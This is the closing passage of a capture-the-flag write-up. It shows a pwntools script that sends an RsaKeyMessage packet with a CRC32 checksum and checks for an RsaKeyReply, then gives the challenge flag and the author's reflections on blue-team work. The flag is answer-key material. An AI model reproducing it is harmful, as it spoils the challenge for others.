checksum_build =  hex(zlib.crc32(packet_rkmsg) & 0xffffffff)

checksum_rkmsg = p32(int(checksum_build, 16), endian="big") 

packet_rkmsg += checksum_rkmsg

print("[*] RsaKeyMessage packet: " + str(packet_rkmsg))

with context.local(log_level='debug'):
    ## Send/reply for RsaKeyMessage
    r.send(packet_rkmsg)

    res = r.recv(2048)

    if b"\x01\x8a" in res:
        print("[+] Received a RsaKeyReply packet!")
    else:
        print("[-] Didn't received a RsaKeyReply packet")
        r.close()

    print("[*] RsaKeyReply packet: " + str(res))
```

So this script get us as far as establish a connection, sending a RsaKeyMessage and receiving a RsaKeyReply packet.

When establishing the connection we received the flag: `DGA{746999b743b91605261e}` !

# CONCLUSION

So I really liked those challenges, it changes from the habitual pwn/reverse engineering challenges and I was really more focused on the blue teaming side this time and didn't regret it at all!

I hope what you read was interesting, I know it was pretty long, so thanks if you took the time to read it.

> Cogito ergo sum